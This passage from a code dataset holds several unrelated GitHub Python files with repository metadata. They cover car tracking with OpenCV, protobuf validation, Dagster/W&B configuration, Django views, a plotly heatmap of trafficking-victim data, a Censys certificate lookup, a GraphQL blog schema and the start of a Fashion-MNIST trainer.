it\r\n only_x, common, only_o = foofunction(xxo, oxo)\r\n # case 1 :\r\n for common_element in common:\r\n all_cars[common_element[1]].TTL = 5\r\n all_cars[common_element[1]].x = new_cars[common_element[0]].x\r\n all_cars[common_element[1]].y = new_cars[common_element[0]].y\r\n all_cars[common_element[1]\r\n ].centroid = new_cars[common_element[0]].centroid\r\n all_cars[common_element[1]].draw = True\r\n # case 2 :\r\n for only_x_element in only_x:\r\n new_cars[only_x_element[0]].label = str(id_vehicle)\r\n new_cars[only_x_element[0]].draw = True\r\n id_vehicle += 1\r\n all_cars = list(all_cars)\r\n all_cars.append(new_cars[only_x_element[0]])\r\n # case 3 :\r\n for only_o_element in only_o:\r\n all_cars[only_o_element[1]].x = 9999\r\n all_cars[only_o_element[1]].y = 9999\r\n all_cars[only_o_element[1]].centroid = (9999, 9999)\r\n all_cars[only_o_element[1]].draw = False\r\n\r\n showdown = all_cars\r\n for element in showdown:\r\n element.history.append(element.centroid)\r\n print(element.history)\r\n if element.draw:\r\n startpoint = element.history[0]\r\n endpoint = element.history[-1]\r\n vector = (endpoint[0]-startpoint[0], endpoint[1]-startpoint[1])\r\n enddraw = (element.centroid[0]+vector[0],\r\n element.centroid[1]+vector[1])\r\n cv2.rectangle(img, (element.x, element.y), (element.x +\r\n element.w, element.y+element.h), (0, 0, 255), 2)\r\n cv2.putText(img, element.label, (element.x, element.y+element.h+50),\r\n cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2, cv2.LINE_AA)\r\n try:\r\n cv2.arrowedLine(img, element.centroid, enddraw, (255, 0, 0), 2)\r\n except:\r\n pass\r\n for i in element.history:\r\n cv2.circle(img, i, 2, (0, 255, 255), -1)\r\n cv2.imshow(\"CAR TRACKING\", img)\r\n time.sleep(0.01)\r\n frame_counter += 1\r\n # Stop if 'q' key is pressed\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n", "repo_name": "nazimbandoui/car_tracking", "sub_path": "track.py", "file_name": "track.py", "file_ext": "py", "file_size_in_byte": 5552, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.all", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 22, "usage_type": "call"}, {"api_name": "cv2.CascadeClassifier", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 43, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 50, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 50, "usage_type": "attribute"}, {"api_name": "numpy.argmin", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 97, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 135, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 137, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 138, "usage_type": "attribute"}, {"api_name": "cv2.LINE_AA", "line_number": 138, "usage_type": "attribute"}, {"api_name": "cv2.arrowedLine", "line_number": 140, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 144, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 145, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 146, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 149, "usage_type": "call"}]} +{"seq_id": "37864710275", "text": "import base64\nimport math\nfrom importlib import import_module\n\nfrom google.protobuf import descriptor\nfrom google.protobuf.json_format import (_FLOAT_TYPES, 
_INFINITY, _INT64_TYPES,\n _NAN, _NEG_INFINITY, Parse)\n\n\ndef validate_protobuf(dataset_path, message):\n \"\"\"Check if a protobuf file is DGP compliant. Throws exceptions if invalid.\n\n Parameters\n ----------\n dataset_path: string\n Path to the dataset file (.json) to be validated.\n message: string\n Target message name to be validated (dgp.proto.dataset.Dataset).\n \"\"\"\n modules = message.split('.')\n assert len(modules) >= 4, '{} needs to be at least 4-tuple valued'.format(message)\n try:\n top_module = modules[0]\n proto, message_name = modules[-2], modules[-1]\n compiled_proto_module = '{}_pb2'.format(proto)\n module_object = import_module(\"{}.{}\".format('.'.join(modules[:-2]), compiled_proto_module))\n target_message = getattr(module_object, message_name)\n except Exception as e:\n raise ValueError('Failed to parse {} proto message: {}'.format(message, e.message))\n\n if not dataset_path.endswith((\".json\", \".pb\", \".prb\")):\n raise IOError(\"{} is not a supported file format. Supported file extenstions: .json, .pb, .prb\")\n\n is_json = dataset_path.endswith(\".json\")\n with open(dataset_path, \"r\" if is_json else \"rb\") as dataset_file:\n if is_json:\n message = Parse(dataset_file.read(), target_message())\n else:\n message = target_message()\n target_message().ParseFromString(dataset_file.read())\n\n schema = getattr('{}.validation', top_module, 'SCHEMA_VALIDATION')\n validate_message(message, schema)\n\n print(\"{} is valid\".format(dataset_path))\n\n\ndef validate_message(message, schema):\n \"\"\"Validate a protobuf message instance. Throws exception if a field value does not match the schema.\n Parameters\n ----------\n message: protobuf message instance\n The protocol buffers message instance to be validated.\n schema: dict\n A dictionary containing field names to NamedTuples of content schema.\n \"\"\"\n for field, value in message.ListFields():\n if _is_map_entry(field):\n v_field = field.message_type.fields_by_name['value']\n for key in value:\n _validate_field(v_field, value[key], schema)\n elif field.label == descriptor.FieldDescriptor.LABEL_REPEATED:\n for v in value:\n _validate_field(field, v, schema)\n else:\n _validate_field(field, value, schema)\n\n\ndef _is_map_entry(field):\n \"\"\"Returns True if the field is a map entry, vice versa.\n Parameters\n ----------\n field: FieldDescriptor\n Field.\n\n Returns\n -------\n exists: bool\n True if the filed is a map entry.\n \"\"\"\n return (\n field.type == descriptor.FieldDescriptor.TYPE_MESSAGE and field.message_type.has_options\n and field.message_type.GetOptions().map_entry\n )\n\n\ndef _validate_content(full_name, content, name_to_schema):\n \"\"\"Validate a single field content if the field name is in the auxiliary schema.\n Parameters\n ----------\n full_name: str\n Full name of the field.\n content: Any\n Field value.\n \"\"\"\n if full_name in name_to_schema:\n schema = name_to_schema[full_name]\n schema.validate(full_name, content)\n\n\ndef _validate_field(field, value, schema):\n \"\"\"Traverse fields, convert field value and call _validate_content to check\n if contents satisfy the auxiliary schema.\n Parameters\n ----------\n field: FieldDescriptor\n Field.\n value: Any\n Value.\n schema: Dict\n Auxiliary content schema imported from dgp.proto.auxiliary_schema\n \"\"\"\n if field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_MESSAGE:\n return validate_message(value, schema)\n\n field_value = value\n if field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_ENUM:\n enum_value = 
field.enum_type.values_by_number.get(value, None)\n if enum_value is not None:\n field_value = enum_value.name\n elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_STRING:\n if field.type == descriptor.FieldDescriptor.TYPE_BYTES:\n field_value = base64.b64encode(value).decode('utf-8')\n else:\n field_value = value\n elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_BOOL:\n field_value = bool(value)\n elif field.cpp_type in _INT64_TYPES:\n field_value = str(value)\n elif field.cpp_type in _FLOAT_TYPES:\n if math.isinf(value):\n field_value = _NEG_INFINITY if value < 0.0 else _INFINITY\n if math.isnan(value):\n field_value = _NAN\n\n _validate_content(field.full_name, field_value, schema)\n", "repo_name": "morsingher/sfm_to_mvs", "sub_path": "ddad/dgp/utils/validator.py", "file_name": "validator.py", "file_ext": "py", "file_size_in_byte": 4862, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "53", "api": [{"api_name": "importlib.import_module", "line_number": 26, "usage_type": "call"}, {"api_name": "google.protobuf.json_format.Parse", "line_number": 37, "usage_type": "call"}, {"api_name": "google.protobuf.descriptor.FieldDescriptor", "line_number": 62, "usage_type": "attribute"}, {"api_name": "google.protobuf.descriptor", "line_number": 62, "usage_type": "name"}, {"api_name": "google.protobuf.descriptor.FieldDescriptor", "line_number": 82, "usage_type": "attribute"}, {"api_name": "google.protobuf.descriptor", "line_number": 82, "usage_type": "name"}, {"api_name": "google.protobuf.descriptor.FieldDescriptor", "line_number": 113, "usage_type": "attribute"}, {"api_name": "google.protobuf.descriptor", "line_number": 113, "usage_type": "name"}, {"api_name": "google.protobuf.descriptor.FieldDescriptor", "line_number": 117, "usage_type": "attribute"}, {"api_name": "google.protobuf.descriptor", "line_number": 117, "usage_type": "name"}, {"api_name": "google.protobuf.descriptor.FieldDescriptor", "line_number": 121, "usage_type": "attribute"}, {"api_name": "google.protobuf.descriptor", "line_number": 121, "usage_type": "name"}, {"api_name": "google.protobuf.descriptor.FieldDescriptor", "line_number": 122, "usage_type": "attribute"}, {"api_name": "google.protobuf.descriptor", "line_number": 122, "usage_type": "name"}, {"api_name": "base64.b64encode", "line_number": 123, "usage_type": "call"}, {"api_name": "google.protobuf.descriptor.FieldDescriptor", "line_number": 126, "usage_type": "attribute"}, {"api_name": "google.protobuf.descriptor", "line_number": 126, "usage_type": "name"}, {"api_name": "google.protobuf.json_format._INT64_TYPES", "line_number": 128, "usage_type": "name"}, {"api_name": "google.protobuf.json_format._FLOAT_TYPES", "line_number": 130, "usage_type": "name"}, {"api_name": "math.isinf", "line_number": 131, "usage_type": "call"}, {"api_name": "google.protobuf.json_format._NEG_INFINITY", "line_number": 132, "usage_type": "name"}, {"api_name": "google.protobuf.json_format._INFINITY", "line_number": 132, "usage_type": "name"}, {"api_name": "math.isnan", "line_number": 133, "usage_type": "call"}, {"api_name": "google.protobuf.json_format._NAN", "line_number": 134, "usage_type": "name"}]} +{"seq_id": "9881877677", "text": "from dagster import (\n Definitions,\n StringSource,\n load_assets_from_package_module,\n make_values_resource,\n)\nfrom dagster_wandb import wandb_artifacts_io_manager, wandb_resource\n\nfrom . 
import assets\nfrom .ops.launch.run_launch_agent import run_launch_agent_example\nfrom .ops.launch.run_launch_job import run_launch_job_example\nfrom .ops.partitioned_job import partitioned_job_example\nfrom .ops.simple_job import simple_job_example\n\nwandb_config = make_values_resource(\n entity=StringSource,\n project=StringSource,\n)\n\ndefs = Definitions(\n assets=load_assets_from_package_module(assets),\n jobs=[\n simple_job_example,\n partitioned_job_example,\n run_launch_agent_example,\n run_launch_job_example,\n ],\n resources={\n \"wandb_config\": wandb_config.configured(\n {\n \"entity\": {\"env\": \"WANDB_ENTITY\"},\n \"project\": {\"env\": \"WANDB_PROJECT\"},\n }\n ),\n \"wandb_resource\": wandb_resource.configured({\"api_key\": {\"env\": \"WANDB_API_KEY\"}}),\n \"io_manager\": wandb_artifacts_io_manager.configured({\"cache_duration_in_minutes\": 60}),\n },\n)\n", "repo_name": "dagster-io/dagster", "sub_path": "examples/with_wandb/with_wandb/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 1159, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8986, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dagster.make_values_resource", "line_number": 15, "usage_type": "call"}, {"api_name": "dagster.StringSource", "line_number": 16, "usage_type": "name"}, {"api_name": "dagster.StringSource", "line_number": 17, "usage_type": "name"}, {"api_name": "dagster.Definitions", "line_number": 20, "usage_type": "call"}, {"api_name": "dagster.load_assets_from_package_module", "line_number": 21, "usage_type": "call"}, {"api_name": "ops.simple_job.simple_job_example", "line_number": 23, "usage_type": "name"}, {"api_name": "ops.partitioned_job.partitioned_job_example", "line_number": 24, "usage_type": "name"}, {"api_name": "ops.launch.run_launch_agent.run_launch_agent_example", "line_number": 25, "usage_type": "name"}, {"api_name": "ops.launch.run_launch_job.run_launch_job_example", "line_number": 26, "usage_type": "name"}, {"api_name": "dagster_wandb.wandb_resource.configured", "line_number": 35, "usage_type": "call"}, {"api_name": "dagster_wandb.wandb_resource", "line_number": 35, "usage_type": "name"}, {"api_name": "dagster_wandb.wandb_artifacts_io_manager.configured", "line_number": 36, "usage_type": "call"}, {"api_name": "dagster_wandb.wandb_artifacts_io_manager", "line_number": 36, "usage_type": "name"}]} +{"seq_id": "14206480497", "text": "#encoding=utf-8\n\nfrom django.shortcuts import render\nfrom blogs.models import Tag, Category, BaseModel\nfrom common.helpers import paged_items, ok_json\nfrom common.pc_m import judge_pc_or_mobile\nfrom tools.models import Tools\n\n\ndef tools(request):\n nav_bar = \"tools\"\n tools_list = Tools.objects.filter(is_active=True).order_by(\"-id\")\n user_agt = judge_pc_or_mobile(request.META.get(\"HTTP_USER_AGENT\"))\n if user_agt is False:\n tools_list = paged_items(request, tools_list)\n return render(request, 'web/pages/tools/tools.html', locals())\n else:\n tools_list = paged_items(request, tools_list)\n return render(request, 'web/pages/tools/tools.html', locals())\n\n\ndef tools_detail(request, tid):\n nav_bar = \"tools\"\n tool_detail = Tools.objects.filter(id=tid).first()\n tool_detail.views += 1\n tool_detail.save()\n user_agt = judge_pc_or_mobile(request.META.get(\"HTTP_USER_AGENT\"))\n if user_agt is False:\n return render(request, 'web/pages/tools/tools_detail.html', locals())\n else:\n return render(request, 'web/pages/tools/tools_detail.html', locals())", "repo_name": 
"gingernet/scoinfamily", "sub_path": "tools/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1119, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "tools.models.Tools.objects.filter", "line_number": 12, "usage_type": "call"}, {"api_name": "tools.models.Tools.objects", "line_number": 12, "usage_type": "attribute"}, {"api_name": "tools.models.Tools", "line_number": 12, "usage_type": "name"}, {"api_name": "common.pc_m.judge_pc_or_mobile", "line_number": 13, "usage_type": "call"}, {"api_name": "common.helpers.paged_items", "line_number": 15, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 16, "usage_type": "call"}, {"api_name": "common.helpers.paged_items", "line_number": 18, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 19, "usage_type": "call"}, {"api_name": "tools.models.Tools.objects.filter", "line_number": 24, "usage_type": "call"}, {"api_name": "tools.models.Tools.objects", "line_number": 24, "usage_type": "attribute"}, {"api_name": "tools.models.Tools", "line_number": 24, "usage_type": "name"}, {"api_name": "common.pc_m.judge_pc_or_mobile", "line_number": 27, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 29, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 31, "usage_type": "call"}]} +{"seq_id": "38768996814", "text": "import pandas as pd\r\nimport numpy as np\r\nimport pyarrow.feather as feather\r\nimport plotly.express as pl\r\nimport plotly.graph_objects as go\r\n\r\n# creates a new df to change df_ht ISO2 to ISO3 for plotly\r\niso_data = pd.read_feather(r\"C:\\DataSci\\Projects\\Data Practice\\ht_region_lookup.ft\")\r\niso_data = iso_data[['ISO2', 'ISO3']]\r\n# converts df to dict for easy replace function\r\niso_dict = dict(iso_data.values)\r\n\r\n# creates new df_ht\r\ndf_ht = pd.read_feather(r\"C:\\DataSci\\Projects\\Data Practice\\ht.ft\")\r\n# replaces ISO2 to ISO3 for citizenship\r\ndf_ht = df_ht.replace({\"citizenship\": iso_dict})\r\n\r\nbool_names = [ 'majorityStatusAtExploit', 'majorityEntry', 'meansOfControlDebtBondage', \r\n 'meansOfControlTakesEarnings', 'meansOfControlRestrictsFinancialAccess', 'meansOfControlThreats', 'meansOfControlPsychologicalAbuse', 'meansOfControlPhysicalAbuse', \r\n 'meansOfControlSexualAbuse', 'meansOfControlFalsePromises', 'meansOfControlPsychoactiveSubstances', 'meansOfControlRestrictsMovement', \r\n 'meansOfControlRestrictsMedicalCare', 'meansOfControlExcessiveWorkingHours', 'meansOfControlUsesChildren', 'meansOfControlThreatOfLawEnforcement', \r\n 'meansOfControlWithholdsNecessities', 'meansOfControlWithholdsDocuments', 'meansOfControlOther', 'meansOfControlNotSpecified', \r\n 'isForcedLabour', 'isSexualExploit', 'isOtherExploit', 'isSexAndLabour', 'isForcedMarriage', 'isForcedMilitary', 'isOrganRemoval', 'isSlaveryAndPractices', \r\n 'typeOfLabourAgriculture', 'typeOfLabourAquafarming', 'typeOfLabourBegging', 'typeOfLabourConstruction', 'typeOfLabourDomesticWork', \r\n 'typeOfLabourHospitality', 'typeOfLabourIllicitActivities', 'typeOfLabourManufacturing', 'typeOfLabourMiningOrDrilling', 'typeOfLabourPeddling', \r\n 'typeOfLabourTransportation', 'typeOfLabourOther', 'typeOfLabourNotSpecified', 'typeOfSexProstitution', 'typeOfSexPornography', \r\n 'typeOfSexRemoteInteractiveServices', 'typeOfSexPrivateSexualServices', 'isAbduction', 'recruiterRelationIntimatePartner', \r\n 'recruiterRelationFriend', 
'recruiterRelationFamily', 'recruiterRelationOther', 'recruiterRelationUnknown']\r\ncol_categ = ['Datasource', 'gender', 'ageBroad', 'majorityStatus', 'citizenship','yearOfRegistration','RecruiterRelationship', 'CountryOfExploitation', ]\r\ncitizenship= ([])\r\ndrop_col = ['gender', 'ageBroad', 'typeOfExploitConcatenated', 'meansOfControlConcatenated', 'typeOfLabourConcatenated', 'typeOfSexConcatenated']\r\n\r\n\r\ndef main():\r\n \"\"\"main function\"\"\"\r\n # change last two parameters to change what years you want to look between\r\n # leave last one blank for just one year\r\n make_df_year(df_ht, 2002, 2021)\r\n\r\ndef make_map(df, year:str):\r\n \"\"\"Given dataframe ir will make the world heat map\"\"\"\r\n # creates figure\r\n fig = go.Figure(data=go.Choropleth(locations = df['citizenship'], z = df['Count'], colorscale='Inferno', autocolorscale=True))\r\n # changes title\r\n fig.update_layout(title={'text':f'Human-Trafficking Heatmap based on victims citizenship for {year}'})\r\n fig.show()\r\n return\r\n\r\ndef make_df_year(df, start_y, ending_y = 0):\r\n \"\"\"Given the year it will make a dataframe with only the given year\"\"\"\r\n years = []\r\n # make list of available years to check the input is correct\r\n for year in np.sort(df['yearOfRegistration'].unique()):\r\n years.append(year)\r\n # print(f'years list: {years}')\r\n # check if only one year\r\n if ending_y == 0:\r\n if start_y in years:\r\n year_df = df.loc[df['yearOfRegistration'] == start_y]\r\n year_df = year_df.groupby(['citizenship'])['citizenship'].count().reset_index(name='Count')\r\n make_map(year_df, str(start_y))\r\n return\r\n else:\r\n print(\"Can't\")\r\n # between years\r\n else:\r\n if start_y in years and ending_y in years:\r\n year_df = df[df['yearOfRegistration'].between(start_y, ending_y)]\r\n year_df = year_df.groupby(['citizenship'])['citizenship'].count().reset_index(name='Count')\r\n make_map(year_df, f'{start_y} to {ending_y}')\r\n return\r\n else:\r\n print(\"Can't\")\r\n\r\nmain()", "repo_name": "cmonitt/Human_Trafficking", "sub_path": "human_trafficking.py", "file_name": "human_trafficking.py", "file_ext": "py", "file_size_in_byte": 4265, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.read_feather", "line_number": 8, "usage_type": "call"}, {"api_name": "pandas.read_feather", "line_number": 14, "usage_type": "call"}, {"api_name": "plotly.graph_objects.Figure", "line_number": 43, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 43, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Choropleth", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.sort", "line_number": 53, "usage_type": "call"}]} +{"seq_id": "16839175316", "text": "from censys.search import CensysCertificates\nimport datetime\nimport csv\n\n\nc = CensysCertificates()\n\nnow = datetime.datetime.now()\n\nfields_to_retrieve = [\n \"parsed.subject_dn\",\n \"parsed.names\",\n \"parsed.subject.common_name\",\n \"parsed.fingerprint_sha256\",\n \"parsed.validity.start\",\n \"parsed.validity.end\",\n]\n\n\ncertificate_list = []\nheader = [\"SHA256 fingerprint\", \"Validity Start\", \"Validity End\"]\n\n\ndef create_csv():\n with open('censys.csv', 'w', encoding='UTF8', newline=\"\") as f:\n writer = csv.writer(f)\n writer.writerow(header)\n for certificate in certificate_list:\n writer.writerow(certificate)\n\n\ndef censys_certificates():\n for page in c.search(\"parsed.names: censys.io and tags: 
trusted\", fields_to_retrieve):\n subject_dn = page[\"parsed.subject_dn\"]\n names = page[\"parsed.names\"]\n validity_start = page[\"parsed.validity.start\"]\n validity_end = page[\"parsed.validity.end\"]\n sha256 = page[\"parsed.fingerprint_sha256\"]\n \n censys_domain_flag = 0\n\n if \"censys.io\".lower() in subject_dn.lower():\n censys_domain_flag = 1\n else:\n for name in names:\n if \"censys.io\".lower() in name.lower():\n censys_domain_flag = 1\n break\n \n validity_end_dt = datetime.datetime.strptime(validity_end, \"%Y-%m-%dT%H:%M:%SZ\")\n\n\n if censys_domain_flag and validity_end_dt >= now:\n certificate_list.append([sha256, str(validity_start), str(validity_end)])\n\n\n\nif __name__ == \"__main__\":\n censys_certificates()\n create_csv()", "repo_name": "SaiVikhyath/Censys-Project", "sub_path": "censys_project.py", "file_name": "censys_project.py", "file_ext": "py", "file_size_in_byte": 1628, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "censys.search.CensysCertificates", "line_number": 6, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 8, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 8, "usage_type": "attribute"}, {"api_name": "csv.writer", "line_number": 26, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 50, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 50, "usage_type": "attribute"}]} +{"seq_id": "31977930526", "text": "import graphene\nfrom .types import BlogType\nfrom .models import Blog\nfrom users.models import CustomUser as User\nimport json\n\nclass BlogQuery(graphene.ObjectType):\n blogs = graphene.List(BlogType)\n blog = graphene.Field(BlogType, id=graphene.ID(required=True))\n user_blogs = graphene.List(BlogType, id=graphene.ID(required=True))\n\n def resolve_blogs(parent, info):\n return Blog.objects.all()\n \n def resolve_blog(parent, info, id):\n return Blog.objects.get(pk=id)\n\n def resolve_user_blogs(parent, info, id):\n author = User.objects.get(pk=id)\n return Blog.objects.filter(author=author)\n \nclass CreateBlogMutation(graphene.Mutation):\n class Arguments:\n title = graphene.String(required=True)\n data = graphene.String(required=True)\n tags = graphene.List(graphene.String)\n more_info = graphene.JSONString()\n \n blog = graphene.Field(BlogType)\n\n @classmethod\n def mutate(cls, root, info, title, data, tags, more_info):\n user = info.context.user\n if(user.is_authenticated):\n author = User.objects.get(pk=user.id)\n blog = Blog(author=author, title=title, data=data, tags=tags, more_info=more_info)\n blog.save()\n return CreateBlogMutation(blog=blog)\n\n raise Exception(\"You need to login to access the api\")\n\nclass UpdateBlogMutation(graphene.Mutation):\n class Arguments:\n id = graphene.ID(required=True)\n title = graphene.String(required=False)\n data = graphene.String(required=False)\n tags = graphene.List(graphene.String, required=False)\n more_info = graphene.JSONString(required=False)\n \n blog = graphene.Field(BlogType)\n\n @classmethod\n def mutate(cls, root, info, id, title=None, data=None, tags=None, more_info=None):\n user = info.context.user\n\n if(user.is_authenticated):\n blog = Blog.objects.get(pk=id)\n \n if(blog.is_project_blog):\n raise Exception(\"This action is forbid on this endpoint.\")\n if(blog.author == user):\n if title is not None:\n blog.title = title\n \n if data is not None:\n blog.data = data\n\n if tags is not None:\n 
blog.tags = tags\n \n if more_info is not None:\n blog.more_info = more_info\n\n blog.save()\n return UpdateBlogMutation(blog=blog)\n raise Exception(\"You don't have permissions to perform this operation\")\n raise Exception(\"You have to be logged in to access api\")\n\nclass DeleteBlogMutation(graphene.Mutation):\n class Arguments:\n id = graphene.ID()\n \n response = graphene.JSONString()\n\n @classmethod\n def mutate(cls, root, info, id):\n user = info.context.user\n\n if(user.is_authenticated):\n blog = Blog.objects.get(pk=id)\n if(blog.is_project_blog):\n raise Exception(\"This action is forbid on this endpoint.\")\n if(blog.author == user):\n blog.delete()\n response = {\n \"success\": True,\n \"error\": False\n }\n return DeleteBlogMutation(response=json.dumps(response))\n raise Exception(\"You don't have permissions to perform this operation\")\n raise Exception(\"You have to logged in to access api\")\n", "repo_name": "sleepingsaint/project-scope", "sub_path": "blogs/schema.py", "file_name": "schema.py", "file_ext": "py", "file_size_in_byte": 3505, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "graphene.ObjectType", "line_number": 7, "usage_type": "attribute"}, {"api_name": "graphene.List", "line_number": 8, "usage_type": "call"}, {"api_name": "types.BlogType", "line_number": 8, "usage_type": "argument"}, {"api_name": "graphene.Field", "line_number": 9, "usage_type": "call"}, {"api_name": "types.BlogType", "line_number": 9, "usage_type": "argument"}, {"api_name": "graphene.ID", "line_number": 9, "usage_type": "call"}, {"api_name": "graphene.List", "line_number": 10, "usage_type": "call"}, {"api_name": "types.BlogType", "line_number": 10, "usage_type": "argument"}, {"api_name": "graphene.ID", "line_number": 10, "usage_type": "call"}, {"api_name": "models.Blog.objects.all", "line_number": 13, "usage_type": "call"}, {"api_name": "models.Blog.objects", "line_number": 13, "usage_type": "attribute"}, {"api_name": "models.Blog", "line_number": 13, "usage_type": "name"}, {"api_name": "models.Blog.objects.get", "line_number": 16, "usage_type": "call"}, {"api_name": "models.Blog.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "models.Blog", "line_number": 16, "usage_type": "name"}, {"api_name": "users.models.CustomUser.objects.get", "line_number": 19, "usage_type": "call"}, {"api_name": "users.models.CustomUser.objects", "line_number": 19, "usage_type": "attribute"}, {"api_name": "users.models.CustomUser", "line_number": 19, "usage_type": "name"}, {"api_name": "models.Blog.objects.filter", "line_number": 20, "usage_type": "call"}, {"api_name": "models.Blog.objects", "line_number": 20, "usage_type": "attribute"}, {"api_name": "models.Blog", "line_number": 20, "usage_type": "name"}, {"api_name": "graphene.Mutation", "line_number": 22, "usage_type": "attribute"}, {"api_name": "graphene.String", "line_number": 24, "usage_type": "call"}, {"api_name": "graphene.String", "line_number": 25, "usage_type": "call"}, {"api_name": "graphene.List", "line_number": 26, "usage_type": "call"}, {"api_name": "graphene.String", "line_number": 26, "usage_type": "attribute"}, {"api_name": "graphene.JSONString", "line_number": 27, "usage_type": "call"}, {"api_name": "graphene.Field", "line_number": 29, "usage_type": "call"}, {"api_name": "types.BlogType", "line_number": 29, "usage_type": "argument"}, {"api_name": "users.models.CustomUser.objects.get", "line_number": 35, "usage_type": "call"}, {"api_name": 
"users.models.CustomUser.objects", "line_number": 35, "usage_type": "attribute"}, {"api_name": "users.models.CustomUser", "line_number": 35, "usage_type": "name"}, {"api_name": "models.Blog", "line_number": 36, "usage_type": "call"}, {"api_name": "graphene.Mutation", "line_number": 42, "usage_type": "attribute"}, {"api_name": "graphene.ID", "line_number": 44, "usage_type": "call"}, {"api_name": "graphene.String", "line_number": 45, "usage_type": "call"}, {"api_name": "graphene.String", "line_number": 46, "usage_type": "call"}, {"api_name": "graphene.List", "line_number": 47, "usage_type": "call"}, {"api_name": "graphene.String", "line_number": 47, "usage_type": "attribute"}, {"api_name": "graphene.JSONString", "line_number": 48, "usage_type": "call"}, {"api_name": "graphene.Field", "line_number": 50, "usage_type": "call"}, {"api_name": "types.BlogType", "line_number": 50, "usage_type": "argument"}, {"api_name": "models.Blog.objects.get", "line_number": 57, "usage_type": "call"}, {"api_name": "models.Blog.objects", "line_number": 57, "usage_type": "attribute"}, {"api_name": "models.Blog", "line_number": 57, "usage_type": "name"}, {"api_name": "graphene.Mutation", "line_number": 79, "usage_type": "attribute"}, {"api_name": "graphene.ID", "line_number": 81, "usage_type": "call"}, {"api_name": "graphene.JSONString", "line_number": 83, "usage_type": "call"}, {"api_name": "models.Blog.objects.get", "line_number": 90, "usage_type": "call"}, {"api_name": "models.Blog.objects", "line_number": 90, "usage_type": "attribute"}, {"api_name": "models.Blog", "line_number": 90, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 99, "usage_type": "call"}]} +{"seq_id": "7183277752", "text": "import datetime\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\n\nfrom model import mlp, conv_net\n\n\nclass_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat',\n 'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']\nnum_steps = 100000\nprint_steps = 1000\nsave_checkpoint_steps = 1000\n\n\ndef get_data():\n \"\"\"\n Get the Fashion MNIST dataset, in the proper data-types and shapes.\n The images are transformed from uint8 in 0,...,255 to float in [0,1].\n The labels are transformed from uint8 to int32.\n \"\"\"\n from tensorflow.keras.datasets import fashion_mnist\n (x_train, y_train), (x_test, y_test) = fashion_mnist.load_data()\n n_train, h, w = x_train.shape\n n_test = x_test.shape[0]\n n_labels = len(np.unique(y_train))\n\n # Reshape the images to include a channels dimension (which is 1),\n # convert them to float32 and divide by 255 to get a value between 0 and 1\n x_train = x_train.reshape(-1, h, w, 1).astype(np.float32) / 255.0\n x_test = x_test.reshape(-1, h, w, 1).astype(np.float32) / 255.0\n\n # Convert the labels to int32 and not uint8, because this is what\n # TensorFlow wants (in the loss function sparse_softmax_cross_entropy_with_logits).\n y_train = y_train.astype(np.int32)\n y_test = y_test.astype(np.int32)\n\n return x_train, y_train, x_test, y_test, n_train, n_test, n_labels, h, w\n\n\ndef train(model_fn, batch_size, learning_rate=None, **model_kwargs):\n \"\"\"\n load FashionMNIST data.\n create model using model_fn, and train it on FashionMNIST.\n :param model_fn: a function to create the model (should be one of the functions from model.py)\n :param batch_size: the batch size for the training\n :param learning_rate: optional parameter - option to specify learning rate for the optimizer.\n :return:\n \"\"\"\n x_train, y_train, x_test, 
